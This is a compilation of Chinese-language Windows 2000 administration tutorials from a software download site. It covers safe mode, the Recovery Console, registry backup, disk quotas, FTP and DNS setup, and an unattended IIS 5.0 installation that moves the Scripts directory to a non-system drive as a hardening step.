§　在安全模式下，Windows 2000 只使用基本文件和驱动程序（鼠标、监视器、键盘、大容量存储器、基本视频、默认系统服务，并且不连接网络）。可以选择"网络安全模式"选项（该选项加载上面所有的文件和驱动程序，加上启动网络所必要的服务和驱动程序），或者"命令提示符安全模式"选项（该选项除了是启动命令提示符而不是启动 Windows 2000 以外，与安全模式完全相同）。也可以选择"最近一次的正确配置"，它使用 Windows 2000 在上次关闭时保存的注册表信息启动计算机。

§　安全模式可帮助用户诊断问题。如果以安全模式启动时没有再出现故障现象，用户可以将默认设置和最小设备驱动程序排除在可能的原因之外。如果新添加的设备或已更改的驱动程序产生了问题，用户可以使用安全模式删除该设备或还原更改。
§　某些情况下安全模式不能帮助用户解决问题，例如当启动系统所必需的 Windows 系统文件已经毁坏或损坏时。在此情况下，紧急修复磁盘 (ERD) 能够提供帮助。
    安全模式选项包括：
    安全模式
    只使用基本文件和驱动程序（鼠标 - 串行鼠标除外、监视器、键盘、大容量存储器、基本视频、默认系统服务并且无网络连接）启动 Windows 2000。如果计算机没有使用安全模式成功启动，则可能需要使用紧急修复磁盘 (ERD) 功能以修复用户的系统。
    网络安全模式
    只使用基本文件和驱动程序以及网络连接来启动 Windows 2000。
    命令提示符的安全模式
    使用基本的文件和驱动程序启动 Windows 2000。登录后，屏幕出现命令提示符，而不是 Windows 桌面、"开始"菜单和任务栏。

    启用启动记录
    启动 Windows 2000，同时将由系统加载（或没有加载）的所有驱动程序和服务记录到文件。该文件称为 ntbtlog.txt，它位于 %windir% 目录中。安全模式、网络安全模式和命令提示符的安全模式，会将一个加载的所有驱动程序和服务的列表添加到启动日志。启动日志对于确定系统启动问题的准确原因很有用。
    启用 VGA 模式
    使用基本 VGA 驱动程序启动 Windows 2000。当安装了使 Windows 2000 不能正常启动的新视频卡驱动程序时，这种模式十分有用。当用户在安全模式（安全模式、网络安全模式或命令提示符安全模式）下启动 Windows 2000 时，总是使用基本的视频驱动程序。
    最近一次的正确配置
    使用 Windows 上一次关闭时所保存的注册表信息来启动 Windows 2000。只在配置不正确时使用。最近一次的正确配置不解决损坏或缺少驱动程序或文件所导致的问题。最后一次成功启动以来所作的任何更改也将丢失。

目录服务恢复模式
    不适用于 Windows 2000 Professional。这是针对 Windows 2000 Server 操作系统的，并只用于还原域控制器上的 SYSVOL 目录和 Active Directory 目录服务。
    调试模式
    启动 Windows 2000，同时将调试信息通过串行电缆发送到其他计算机。
    使用"最后一次正确的配置"启动 Windows 2000
    步骤1 单击"开始"，然后单击"关闭系统"。
    步骤2 单击"重新启动"，然后单击"确定"。
    步骤3 在看到消息"请选择要启动的操作系统"后，请按 F8。
    步骤4 使用箭头键高亮显示"最近一次的正确配置"，然后按 ENTER。
    必须关闭 NUM LOCK，数字键盘上的箭头键才能工作。
    步骤5 使用箭头键高亮显示操作系统，然后按 ENTER。

15.4 故障恢复控制台
    如果安全模式 和其他启动选项不能工作，则可以考虑使用"恢复控制台"；然而，只有用户是高级用户或管理员（可以使用基本命令标识和定位有问题的驱动程序和文件）时，才推荐用户使用该方法。"恢复控制台"是命令行控制台，在使用计算机 CD 驱动器中的启动光盘或使用从创建的软盘启动计算机后即可使用。有关如何从启动光盘中创建软盘的详细信息，
    要使用"恢复控制台"，用户需要以 Administrator 帐户登录。该控制台提供了可用于执行简单操作的命令（例如转到不同的目录中或查看目录）和功能更强大的操作命令（例如修复启动扇区）。通过在"恢复控制台"的命令提示符下，键入 help，可以获得这些命令的帮助信息。
    使用"恢复控制台"，可以启动和停止服务，在本地驱动器（包括用 NTFS 文件系统格式化的驱动器）上读、写数据，从软盘或 CD 上复制数据，修复启动扇区或主引导记录，并执行其他管理任务。如果需要通过从软盘或 CD-ROM 上复制文件来修复系统，或需要重新配置使计算机无法正常启动的服务，则"恢复控制台"特别有用。例如，可以使用"恢复控制台"用软盘中的正确副本替换被覆盖或损坏的驱动程序文件。

1.启动计算机并使用"恢复控制台"
    步骤1 在适当的驱动器中，插入"Windows 2000 安装"光盘或用该光盘创建的第一张软盘。
    对于不能从 CD 驱动器中启动的系统，必须使用软盘。
    对于可从 CD 驱动器中启动的系统，可以使用 CD 或软盘。
    步骤2 重新启动计算机，如果使用软盘，要在系统提示下依次插入每张软盘。
    步骤3 当开始基于文本部分的安装时，请根据提示，按 R 键选择修复或恢复选项。
    步骤4 当系统提示时，按 C 键选择"修复控制台"。
    步骤5 按照屏幕上的说明，重新插入为启动系统而创建的一张或多张软盘。
    步骤6 如果有双启动或多启动系统，请选择需要从"恢复控制台"中访问的 Windows 2000 安装。
    步骤7 系统提示时，键入 Administrator 的密码。
    步骤8 在系统提示处，键入"恢复控制台"命令，键入 help 可获得一系列命令的帮助信息，或者键入 help commandname 获得特定命令的帮助信息。
    步骤9 要退出"恢复控制台"并重新启动计算机，请键入 exit。

2.从运行 Windows 2000 的计算机上使用"恢复控制台"
    步骤1 将 Windows 2000 光盘插入到光盘驱动器中。
    步骤2 单击"文件"，然后单击"运行"。
    步骤3 在"打开"框中，键入命令：
    d:\i386\winnt32 /cmdcons （d 是指派给 CD-ROM 驱动器的驱动器号）
    步骤4 重新启动计算机并从可用操作系统列表中选择故障恢复控制台选项。
    步骤5 系统提示时，键入 Administrator 的密码。
    步骤6 在系统提示处，键入"恢复控制台"命令，键入 help 可获得一系列命令的帮助信息，或者键入 help commandname 获得特定命令的帮助信息。
    步骤7 要退出"恢复控制台"并重新启动计算机，请键入 exit。

    15.5 紧急修复磁盘
    步骤1 准备一张空白的、已格式化的 1.44 (MB) 的软盘。
    步骤2 打开"备份" 如图 15.2。
    步骤3 在"欢迎"选项卡上，单击"紧急修复磁盘"。
    步骤4 根据屏幕上显示的说明进行。
    当完成安装之后，将原始系统设置的信息保存在系统分区的 systemroot\Repair 文件夹中。如果使用"紧急修复磁盘"来修复用户的系统，那么可以访问该文件夹中的信息。一定不要更改或删除该文件夹。

    15.6 性能监视器
    使用"系统监视器" 如图 15.3可以衡量自己计算机或网络中其他计算机的性能：
§　收集并查看本地计算机或多台远程计算机上的实时性能数据。
§　查看计数器日志中当前或以前搜集的数据。
§　在可打印的图形、直方图或报表视图中表示数据。
§　利用自动操作将"系统监视器"的功能并入 Microsoft Word 或 Microsoft Office 套件中的其他应用程序。
§　在性能视图下创建 HTML 页。
§　创建可使用 Microsoft 管理控制台在其他计算机上安装的可重新使用的监视配置。

使用"系统监视器"可以收集和查看大量有关管理的计算机中硬件资源使用和系统服务活动的数据。可以通过下列方式定义要求图形搜集的数据：
§　数据类型。要选择搜集的数据，请指定性能对象、性能计数器和对象实例。
    一些对象提供有关系统资源（例如内存）的数据，而其他对象则提供有关应用程序运行的数据（例如计算机中正在运行的系统服务或 Microsoft BackOffice 应用程序）。
§　数据源。"系统监视器"可以从本地计算机或网络上用户拥有权限的其他计算机中搜集数据。（默认情况下，应该拥有管理权限。）此外，可以包含实时数据和以前使用计数器日志搜集的数据。
§　采样参数。"系统监视器"支持根据需要手动采样或根据指定的时间间隔自动采样。查看记录的数据时，还可以选择开始和停止时间，以便查看跨越特定时间范围的数据。

    15.7 任务管理器
    "Windows 任务管理器" 如图 15.4 提供了有关计算机性能、计算机上运行的程序和进程的信息。要打开" Windows 任务管理器"，请用右键单击 任务栏 上的空白处，然后单击"任务管理器"。任务管理器提供正在用户的计算上运行的程序和进程的相关信息。也显示最常用的度量进程性能的单位。
    使用任务管理器可以监视计算机性能的关键指示器。可以快速查看正在运行的程序的状态，或者终止已停止响应的程序。也可以使用多达 15 个参数评估正在运行的进程的活动，以及查看 CPU 和内存使用情况的图形和数据。

正在运行的程序
    "应用程序"选项卡显示计算机上正在运行的程序的状态。
    在此选项卡中，用户能够结束、切换或者启动程序。
    正在运行的进程
    "进程"选项卡显示关于计算机上正在运行的进程的信息。
    例如，用户可以显示关于 CPU 和内存使用情况、页面错误、句柄计数以及许多其他参数的信息。
    性能度量单位
    "性能"选项卡显示计算机性能的动态概述，其中包括：
    CPU 和内存使用情况的图表。
    计算机上正在运行的句柄、线程和进程的总数。
    物理、核心和认可的内存总数（KB）。

    15.8 任务计划
    使用任务计划程序，用户可以安排任何脚本、程序或文档在最方便的时候运行。每次启动 Windows 2000 时，任务计划程序也会启动，并在后台运行。
    使用任务计划程序可以完成以下任务：
§　计划让任务在每天、每星期、每月或某些时刻（如系统启动时）运行。
§　更改任务的计划。
§　停止计划的任务。
§　自定义任务如何在计划的时间运行。
    Windows 2000 自动安装任务计划程序。要使用计划服务，请在"控制面板"中双击"任务计划"文件夹。
    通过双击"添加任务计划"启动"任务计划向导"，可以计划新任务。通过将脚本、程序或文档从 Windows 资源管理器或桌面拖到"任务计划"窗口中可以进行任务添加。
    也可以使用任务计划程序来修改、删除、禁用或停止已经计划的任务，查看已计划任务的日志，或者查看在远程计算机上计划的任务。
    网络管理员可以创建用于维护目的的任务文件，并在需要时将其添加到用户的计算机。可以在电子邮件中发送和接收任务文件，并且可以共享计算机上的"任务计划"文件夹以便通过"网上邻居"远程访问它。

返回


用ERUNT自动备份Windows 2000/XP的注册表

《一键清理系统垃圾》

用ERUNT自动备份Windows 2000/XP的注册表

    为了提高注册表的安全性，最好的做法是及时备份。手工备份非常麻烦，我们不妨利用ERUNT这款专用的注册表备份和恢复工具。ERUNT是一款免费软件，无需安装即可使用，文件大小为578KB。

    下载地址：http://down1.tech.sina.com.cn/download/downContent/2004-06-04/10261.shtml

    运行ERUNT后，在其界面的“Backup to”后面指定备份注册表的位置和名称(默认为C:\ERDNT)，然后在“Backup Options”选择备份选项，建议将下面的三个项目都选中，单击 “OK”按钮即可开始备份。需要注意的是，该软件仅能备份系统注册表中当前用户的注册表文件。需要恢复注册表时，运行ERUNT，选择恢复的注册表项目，单击“OK”按钮，再根据提示重新启动计算机即可。

    那怎样让ERUNT自动备份注册表呢？假设软件位于C:\ERUNT文件夹，备份注册表文件到D:\zcb，新建一快捷方式，在“键入项目的位置”输入C:\ERUNT\ERUNT.EXE D:\zcb /noconfirmdelete，把它放到启动程序组，每次系统启动时就会自动执行备份注册表的操作了！


用Win2000 Server限制用户存储空间

《一键清理系统垃圾》

用Win2000 Server限制用户存储空间

在Windows NT 4.0中，在不借助第三方软件的情况下，用户可以无限制地占用服务器的存储空间，这大大地影响了服务器资源的合理利用，如有的用户在设计自己的网站时，经常把没用的文件放置到自己的站点上，而管理人员又不知其是否有用。随着Windows 2000 Server的推出，我们可以利用其所增设的一项磁盘配额功能，来进行磁盘空间的合理分配，提高存储空间的有效利用。

■Windows 2000新增了磁盘限额功能

通过使用卷的磁盘配额跟踪以及控制磁盘空间，系统管理员可将 Windows 配置为：用户超过所指定的磁盘空间限额时，阻止其进一步使用磁盘空间并记录此事件。启用磁盘配额时，可以设置两个值：磁盘配额限度和磁盘配额警告级别。该限制指定了允许用户使用的磁盘空间容量。警告级别指定了用户接近其配额限度的值。例如，可以把用户的磁盘配额限度设为50MB，并把磁盘配额警告级别设为45MB。这种情况下，用户可在卷上存储不超过50MB 的文件。如果用户在卷上存储的文件超过45MB，则把磁盘配额系统记录为系统事件。

■设置磁盘空间限额的要求

1.磁盘卷必须是用Windows 2000中使用的NTFS版本格式化的。用Windows NT 4.0中使用的NTFS版本格式化的卷将被Windows 2000安装程序自动升级。

2.要管理卷上的配额，必须是驱动器所在计算机上的Administrators 组的成员。文件压缩不影响配额统计。例如，如果用户限制3MB的磁盘空间，则只能存储3MB以内的文件。

图1

如果卷不是用NTFS格式化的或者不是本地计算机上的Administrators组的成员，那么卷的属性页上将不显示“配额”选项卡。

■磁盘空间限额的设置

1.打开“我的电脑”。

2.右键单击要创建报告的卷，然后单击“属性”。

3.在“属性”对话框中，单击配额选项卡，系统显示如图1的选项卡。

在这一选项卡中，系统默认没有启动配额管理，只要单击“启用配额管理”选项就可以启动配额管理，选择“将磁盘空间限制为”项，在其下面输入限制值，同时可以设置警告等级。设置好这些选项后，Windows 2000 Server仍然能够让用户在超过限制值后继续向服务器存放文件，如不让用户继续存放文件，只要选中“拒绝将磁盘空间给超过配额限制的用户”选项卡，超过配额限制的用户就不能够继续向服务器存放文件了。如果管理人员想了解用户超过指定限额的情况，只要选择“该卷的配额记录”选项，当用户达到这里所规定的要求时，计算机自动会将其记录下来，系统管理员可以通过“事件查看器”来查看。

图2

磁盘限额设置只能应用到“启用卷的磁盘配额到管理”后所创建的用户上，系统设定后自动跟踪新用户卷的使用。但是，磁盘配额不能用到已经存在的卷用户上。我们可以通过在“配额项”窗口中添加新的配额项目将磁盘空间配额应用到现有的卷用户上。

■配额项的使用

配额项主要用于具体查看、更改、添加、删除对某一用户的配额，即在上面磁盘配额中所设置的是对后来所创建的所有用户都起作用，而配额项使我们可以具体对某一用户进行设置。我们只要单击上图的“配额项”，就会出现如图2的窗口。

在这一窗口中列出了当前已经设置了配额的所有用户账号使用磁盘空间的情况，双击相应用户，可以更改这一用户的磁盘空间限额。如要删除某一用户的磁盘空间限额，只要选择相应用户，选择“配额”选单中的“删除配额项”。对于在“启用配额管理”之前创建的用户，我们可以选择“配额”选单中的“新建配额项”，弹出下面用于选择用户建立配额项的对话窗口，我们可以选择一个或一批还没有创建配额的用户后，单击确定，在对话框中输入限制的数量就可以创建。

通过上面的方法创建的磁盘配额项只适用于卷，且不受卷的文件夹结构及物理磁盘上的布局限制。如果卷有多个文件夹，则分配给该卷的配额将整个应用于所有文件夹。例如，如果\\Production\QA和\\Production\Public是Ｆ卷上的共享文件夹，则用户对这两个文件夹的使用不能超过已指派的Ｆ卷配额。如果单个物理磁盘包含多个卷，并把配额应用到每个卷，则每个卷配额只适于特定的卷。例如，如果您共享两个不同的卷，分别是Ｆ卷和Ｇ卷，则即使这两个卷在相同的物理磁盘上，也会分别对这两个卷的配额进行跟踪。

图3

返回


用WINDOWS2000架设自己的FTP SERVER

《一键清理系统垃圾》

用WINDOWS2000架设自己的FTP SERVER

    不知道大家遇到过这样的问题没有，若你的一个朋友想你给他发一个3M的数据包，如果你用E－mail发,则闲慢，要是先上传然后再下载，又闲太麻烦。那怎么办呢？难道就不能让朋友来自己的机器上“拖”吗？这的确是个好办法。在以前也有很多人介绍过怎样把Win98或者Win95之类的操作系统设置成为FTP的服务器，可是那些都需要第三方的软件才可以实现，今天有了Win2000一切都变得非常简单了，只需要很简单的几个设置就可以解决这些问题了。

    1．首先要在“控制面版”“添加/删除程序”“添加/删除Windows组件”里面添加“Internet服务（IIS）”。因为这里面包含了IIS服务需要的所有文件，其中就有FTP传输协议。

    2．在添加过Internet服务以后，“控制面板”中就会出现“管理工具”选项。双击“管理工具”选择“Internet服务器管理”。

    3．选择“默认FTP站点”，点击鼠标右键选择“属性”，进行FTP站点的设置。其中包括“FTP站点”、“安全账号”、“消息”、“主目录”、“目录安全性”等设置。

    FTP站点：主要用于设置FTP 标识说明，连接设置和设置起用日志记录等功能。

    安全账号：主要用于账号的设置。

    消息：在这里可以设置用户访问本服务器时所显示的消息。

    FTP主目录：用于设置用户访问本FTP站点时所访问的主目录路径。

    目录安全性：用于设置访问本FTP服务器用户IP访问限制的授权列表。

    完成了以上的设置后，本FTP服务器就可以正常运作了。

    现在当你上网的时候，就可以把你自己的IP地址给你的朋友，然后他就可以来访问你的机器，下载所需的东西了。原来FTP 服务器做起来就是这么简单。

    但是对于拨号上网的用户来说，一个非常重要的问题就是没有固定的IP，也就意味着每次都要告诉人家不同的IP，那能不能想些简单的办法来解决这个问题呢？就在我要结束这篇文章的时候，在网络上找到了这个叫做DynIP的软件。它的主要功能就是能够把你每次拨号的移动IP上传到DynIP的域名服务器上，由DynIP给你提供一个叫做xxx.dynip.com的域名。这下问题就变得简单多了，你只需要在hostname一栏添入想要的名字即可。在每次开机的时候，它都会自动地提交你的IP地址，然后你的域名服务器开始工作。注意：你的域名不能和其他人的名字重复，否则将会失效；另外这个软件的所有启动默认设置，都是按照拨号上网用户类型来设置的，因此在使用过程中不需要做任何改动。

返回


域和信任关系的管理

《一键清理系统垃圾》

域和信任关系的管理

Windows2000中的DNS服务

1. Windows2000中的DNS有三种区域类型（Zone Type）:

a Standard Primary ------ 区域数据库文件的主拷贝，保存为文本文件
b Standard Secondary----- 区域数据库文件的拷贝，保存为只读的文本文件
c Active Directory integrated ------ 保存在Active Directory中的区域数据库文件，当执行Active Directory复制时，区域文件被更新
2. 配置区域传送

区域传送（Zone Transfer）是在多个DNS服务器之间复制区域数据库文件的过程。主要通过拷贝过程完成。
发生的时间：Master Server 向Secondary Server发送更新通知 Secondary Server初始启动或达到刷新时间间隔时，会向 Master Server查询变化
复制的方法：Full zone transfer（AXFR）------ 复制整个区域数据库文件 Incremental zone transfer（IXFR）------ 仅复制改变的数据
WindowsNT4.0仅支持AXFR，而Win2000支持AXFR和IXFR
3. 配置Active Directory Integrated区域

Win2000提供DNS和Active Directory的集成。由于Active Directory使用基于DNS的名字空间，从而不必创建或维护单独的名字服务。若要将DNS与Active Directory集成，则DNS必须运行于动态更新协议（Dynamic Update Protocol）。

Win2000的DNS服务包括一个SRV（Service）资源记录，用于识别网络资源，类似于WinS中的NetBIOS名。例如，你可以用SRV记录来定位域控制器。 SRV记录可被用于标准区域中，也可用于Active Directory集成区域。

可以将现存的标准区域转换成Active Directory集成区域，但要注意：
（1）DNS服务必须运行于域控制器上
（2）由于Active Directory区域保存在Active Directory中，所以没有区域文件保存在服务器的硬盘上
4. 配置动态更新（Dynamic Update）

原来，DNS被设计为区域数据库是静态改变的。这意味着添加、删除或修改资源记录仅能通过手工完成。

Win2000支持DNS的动态更新。通过动态更新协议，允许客户计算机自动更新DNS Server，而不需管理员的干涉。

动态更新协议可用于和DHCP的连接来动态更新资源记录。当DHCP客户的IP地址更新时，DHCP Server会通知DNS Server更新资源记录。

若要实现动态更新，则必须配置DHCP。在DHCP属性Dynamic DNS标签中，选择选项Enable dynamic update of DNS client information。

另外，在Win2000中，提供了对DNS的测试功能。包括简单查询和递归查询。

返回


在WIN2000中安装IIS 5.0

《一键清理系统垃圾》

在WIN2000中安装IIS 5.0

在安装Windows2000的时候，如果你选择了安装IIS，那么在安装的时候系统将会你的%SystemDrive%里创建一个InetPub目录，而且还会在Inetpub目录下创建一个Scripts目录，IIS还会创建一个虚拟目录SCIPTS指向该目录，并且给这个目录执行权限。前段时间NSFocus安全小组研究发现的“Unicode解码目录遍历漏洞”大部分问题就是针对Web站点的可执行目录而言的，所以我们建议把该目录移到非系统盘在一定程度上可以保证一定的安全。

    然而在我们选择安装系统组件的时候，无法自己定义IIS的安装盘符，所以才有了今天的这篇文章。：）

    我们在安装系统的时候不选择安装IIS，等系统安装完成后手动来做，我们可以使用无人值守的方式自定义安装IIS 5.0。首先确认你的 Windows 2000的安装介质是可用的，本例中的安装介质是光盘，因此只要将安装光盘插入光驱即可，然后在你的硬盘或者软盘上创建一个无人值守安装文件，本例中我们将在D盘创建一个 IIS5install.txt 作为无人值守安装文件，下面我们看看该文件的内容：

[Components]　　'所安装的组件
iis_common = on　　'公用文件
iis_inetmgr = on　 'IIS管理器
iis_www = on　　'WWW服务
iis_ftp = on　　'FTP服务
iis_htmla = on　　'Web方式的IIS管理器

[InternetServer]
Path="D:\inetsrv"　'Common文件放置位置（如果你是卸载了IIS再手动装，公用文件还是会位置保持不变）
PathFTPRoot="D:\inetPub\FTPRoot" 'FTP的根路径
PathWWWRoot="D:\InetPub\wwwroot" 'WWW的根路径

将该文件存盘后，运行“sysocmgr /i:%windir%\inf\sysoc.inf /u:d:\iis5install.txt”，
不会有提示框出现，系统将自动的为你安装好IIS，而且Scripts目录将会在D盘，使用“Unicode解码目录遍历漏洞”也就失效了。

如果你需要安装更多的IIS组件，以下是一个比较详细的无人值守安装文件：

==========BEGIN===================

;This is an example Unattended installation file
;IIS, MTS, and Index Server are ON
;Target Path should be new directory
;Adminpassword is blank.

[Unattended]
Unattendmode = FullUnattended
OemPreinstall = NO
TargetPath = *
Filesystem = LeaveAlone

[UserData]
FullName = "Your User Name"
OrgName = "Your Organization Name"
ComputerName = "ComputerName"

[GuiUnattended]
TimeZone = "004"
AdminPassword = *
AutoLogon = Yes

[LicenseFilePrintData]
AutoMode = "PerServer"
AutoUsers = "0"

[Display]
BitsPerPel = 4
XResolution = 800
YResolution = 600
VRefresh = 70

[Networking]
InstallDefaultComponents = YES

[Identification]
JoinWorkgroup = Workgroup

;Turns NT Components (and their respective sections) ON or OFF
[Components]
iis_common = on
iis_inetmgr = on
iis_www = on
iis_ftp = on
iis_htmla = on
iis_doc = on
iis_pwmgr = on
iis_smtp = on
iis_smtp_docs = on
mts_core = on
msmq = off
terminalservices = off
reminst = off
certsrv = off
rstorage = off
indexsrv_system = on
certsrv_client = off
certsrv_server = off
certsrv_doc = off

[InternetServer]
;Without these keys specified IIS will use the default settings
; Note that the Path is location for INETSRV, the core IIS programs and files.
Path=D:\Securelocation
PathFTPRoot=E:\Inetpub\Ftproot PathWWWRoot=E:\Inetpub\Wwwroot

返回


在Windows 2000中删除不需要的组件

《一键清理系统垃圾》

返回总目录 上一页 目录页

在Windows 2000中删除不需要的组件

    在Windows 2000的安装过程中，根本不让我们选择需要安装的组件，就直接把什么组件都安装上了。而且安装完成后，从控制面板的“添加／删除程序”中根本看不到如游戏、写字板这一类组件的选项。其实还是有办法把它们找回来的，使你像在Win95／98下添加／删除所有组件般方便，方法如下：
    1．打开\winnt\inf文件夹（注意：该文件夹为隐藏属性），找到sysoc.inf文件，双击它用记事本打开。
    2．用记事本的查找／替换功能，在“查找”框中输入“，hide”（一个英文逗号紧跟hide），将“替换为”框设为空。并选“全部替换”，这样，就把所有的“，hide”都去掉了。
    3．存盘退出。
    4．再打开控制面板中的“添加／删除程序”，单击“windows 组件”，就会看见多出了附件、传真等组件。


Windows 2000

《一键清理系统垃圾》

返回总目录

Windows 2000

◎2K服务详解
◎2K修改注册表加强安全
◎2000XP双系统启动问题
◎2000密码破解
◎DHCP 服务器的安装和配置
◎DNS 服务器的配置与管理
◎DNS在活动目录中的应用
◎WIN2000 Server的新功能及安装
◎Site在活动目录中的应用
◎Win98+Win2000+WinXP三操作系统共同使用安装实录
◎Win2000 Professional版的功能
◎Win2000/XP下的SFC使用参数
◎WIN2000 实现网络共享连接
◎Win2000 硬盘/内存完美优化
◎win2000server安全设置的一些小技巧[推荐]
◎Windows2000/XP启动过程详解
◎Win2000常见问题解决方案
◎Win2000故障解决一览
◎Win2000记事本的新功能
◎Win2000进程
◎Win2000蓝屏画面错误代码说明(1)
◎Win2000蓝屏画面错误代码说明(2)
◎Win2000蓝屏画面错误代码说明(3)
◎Win2000蓝屏画面错误代码说明(4)
◎Win2000蓝屏画面错误代码说明(5)
◎Win2000蓝屏画面错误代码说明(6)
◎Win2000蓝屏画面错误代码说明(7)
◎Win2000命令全集
◎在Windows 2000使用纯DOS的方法
◎Win2000设置技巧
◎Win2000优化完全版
◎Win2000专业版安装指南
◎Windows2000安全检查清单
◎Windows2000常见问题解答
◎Windows2000蓝屏死机故障处理
◎Windows2000实用工具四则
◎Windows2000实用技巧
◎Windows2000网络新功能
◎Windows2000系统优化指南
◎Windows2000硬盘操作小技巧
◎Windows2000中的小秘密
◎Windows2000中硬盘操作小技巧
◎Windows2000注册表的备份与恢复
◎Windows2000――最佳的网络运用平台
◎WINDOWS2000作企业内部网服务器详解
◎Windows 2000 Advanced Server中的Dcpromo命令
◎Windows 2000 Server 的高级管理
◎windows 2000/XP/2003服务全集
◎Windows 2000 的基本管理
◎Windows 2000 的虚拟专用网络
◎Windows 2000 的一些基本概念
◎Windows 2000 网络客户端的安装和配置
◎Windows 2000 中的DHCP-网络管理员的新利器
◎Windows 2000Server中DNS的实现
◎Windows 2000/XP操作系统故障恢复控制台
◎Windows 2000安装10大要点
◎Windows 2000的可靠性
◎Windows 2000的零管理
◎Windows 2000服务器家族--卓越的电子商务平台
◎Windows 2000公钥基础结构及在电子商务中应用
◎Windows 2000构建的远程访问服务
◎Windows 2000光盘探秘
◎Windows 2000实用技巧
◎Windows 2000实用技巧集锦
◎Windows 2000死机的应急处理
◎Windows 2000—网络更精彩
◎Windows 2000系统策略编辑器
◎Windows 2000系统的诊断与恢复
◎Windows 2000系统文件夹一览
◎Windows 2000系统下修改注册表加强安全
◎Windows 2000页面文件的优化
◎Windows 2000中蓝屏死机之停止信息分析
◎Windows 2000注册表的备份与恢复
◎Windows 2000注册表直通车
◎Windows XP和2000操作系统自动关机的实现
◎WINS 服务器的安装与设置
◎安全管理
◎安全正确的配置Win2000+IIS5.0服务器
◎把mirserver的所有启动文件添加为win2000服务
◎动态域名系统
◎多语言技术、IE5.0和系统的安全稳定性
◎防止电脑死机二十五招之Win2000篇
◎给Win2000减减肥
◎跟我一起安装Windows 2000
◎构建Win2000服务器的安全防护林
◎管理Internet 信息服务器
◎管理计算机和用户帐号
◎活动目录服务的基本安装和配置
◎解决NTFS下Win2000密码丢失
◎紧急恢复Windows98/2000双启动
◎禁用Windows2000/XP系统默认共享
◎禁止Win2000启动时读软驱
◎快速恢复Windows 2000/XP遗忘的管理员密码
◎利用Windows 2000快速建立小型网络
◎目录服务
◎配置远程安装服务和设置用户配置文件
◎浅析Windows 2000的电源管理
◎清除Windows 2000的系统默认“共享”
◎让Win2000变苗条
◎大家共同分享
◎如何关闭WIN2000下面的消息服务
◎实现Win 2000与Win 98的对等连接
◎实现Windows 98与2000的共享
◎使Windows 2000在关机后自动关闭电源
◎使用win2000的一点经验
◎视窗2000缺陷知多少
◎数据存储
◎探索Windows 2000——系统的优化与维护
◎探索Windows 2000——系统工具
◎微软Windows 2000索引服务的文件验证漏洞
◎文件和打印系统的配置与管理
◎无人值守安装win2000的方法
◎系统的诊断与修复
◎修改注册表提高Win2000抗拒绝服务攻击能力
◎用ERUNT自动备份Windows 2000/XP的注册表
◎用Win2000 Server限制用户存储空间
◎用WINDOWS2000架设自己的FTP SERVER
◎用Windows 2000 Server作路由器
◎域和信任关系的管理
◎在Windows 2000使用纯DOS的方法
◎在WIN2000中安装IIS 5.0
◎在Windows 2000下安装内猫
◎在Windows 2000中删除不需要的组件

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


IIS组建Intranet完全手册

《一键清理系统垃圾》

返回总目录 目录页 下一页

IIS组建Intranet完全手册

     不断有收到读者和网友的来信询问如何在建立内部的电子邮件系统、如何在局域网中发布主页，以及是否可以在局域网中利用AceFTP、CuteFTP来上传个人主页到单位的 Intranet 服务器等问题。对于建立内部电子邮件系统这个问题，大家可以参见本站的《利用MS 电子邮局建立简易邮件系统》一文，我们在这里将连续讲解如何通过 IIS 来建立一个 Intranet ，主要是 WWW、FTP服务器的建立及DNS、DHCP服务器、WINS服务器的建立，同时说明在局域中如何实现将 FrontPage 98 网站传送到服务器，包括 FrontPage 98 内建的程序和第三方的 AceFTP、CuteFTP 等。
     大致步骤如下：
     一、服务器的准备、必备协议及服务的安装、设置
     二、IIS管理器的配置、应用
     三、FrontPage 98 网站的上传
     注：本文严格按照实验记录整理，请朋友们在参照本文设置时对一些涉及名称、目录的地方注意换成您系统原有的东西。
     一、基于服务器的准备
     1、WIN NT安装目录：C:\WINNT文件夹中；
     2、“服务器类型”：“主域控制器”；
     3、计算机名：“Heatch”；
     4、域名：“LANhome”。
     上述两项可通过“控制面板”/“网络”/“标识”项的“更改”来重新指定。
     5、在“控制面板”/“网络”/“服务”中已安装“Microsoft DNS服务器”；
     在“控制面板”/“网络”的网络协议列表中双击“TCP／IP通讯协议”进入TCP／IP属性设置对话框。单击“DNS”标签，主机名是Heatch——若在这里输入的是另一个名称，系统则会出现一个关于局域网的主机名与 Internet 所用的主机名不同的提示——在“域”中键入域名com，在“DNS服务器搜索顺序”中添加主机 Heatch 的 IP 地址，199.168.1.1；然后单击“IP地址”标签进入下一步：
     6、在“控制面板”/“网络”/“协议”中已安装“TCP/IP协议”；
     在“IP地址”对话框中选择“指定IP地址”，在IP地址栏键入199．168．1．1，按TAB键跳转，系统自动给出子网掩码255．255．0．0。单击“高级”按钮，进入“高级IP寻址”对话框，在“IP地址”栏中单击“添加”按钮，依次加入WWW、FTP主机的IP地址：
     199.168.1.10　　 255.255.0.0　　 WWW
     199.168.1.11　　 255.255.0.0　　 FTP中
     然后单击“确定”按钮、单击“WINS地址”标签进入下一步：
     7、在“控制面板”/“网络”/“服务”中已安装“Microsoft WINS服务器”；
     在“主WINS服务器”栏中键入 Heatch 的IP地址199.168.1.1。
     若是第一次安装或做了修改，确认后，系统会提示重新启动。

    二、IIS 管理器的配置、应用
     1、安装 IIS ：
     IIS可以在安装NT Server 4.0的同时选择“安装 Microsoft Internet Information Server”复选项进行安装，也可以在安装NT Server 4.0后再进行安装。在安装IIS之前，系统必须已经安装TCP/IP协议。
     下面说明如何在 Windows NT 环境安装 IIS 服务：依次选取“开始”/“设置”/“控制面板”/“网络”/“服务”/“添加”， 从“网络服务”列表中，选择“Microsoft Internet Information Server”，然后单击“确定”按钮，就可以进行IIS的安装。 选择Internet 服务管理器、WWW、FTP 服务、ODBC 启动程序和管理等四项。默认的安装文件夹是C:\Winnt\System32\Inetsrv；默认的服务文件夹为C:\InetPub\Wwwroot和C:\InetPub\Ftproot。
     也可以直接在 Windows NT 安装光盘的 \i386\InetSrv子目录下，直接运行安装程序Inetsetup.EXE。
     2、配置DNS域名服务器
     依次选取“开始”/“程序”/“管理工具（公用）”/“DNS管理器”，出现“域名服务管理器”主窗口，服务器清单中已经列出了主机名为Heeatch的服务器，单击右键，在弹出菜单中选择“新建区域”，在对话框中依次选择“主要”/“下一步”，在“为 Heatch 创建新区域”对话框中的“区域名”一项输入com，按TAB键跳转到“区域文件”一项时系统会自动给出com.dns文件名。确定后可以看见“域名服务管理器”主窗口的右边已经列出新建区域 Heatch 属性值。
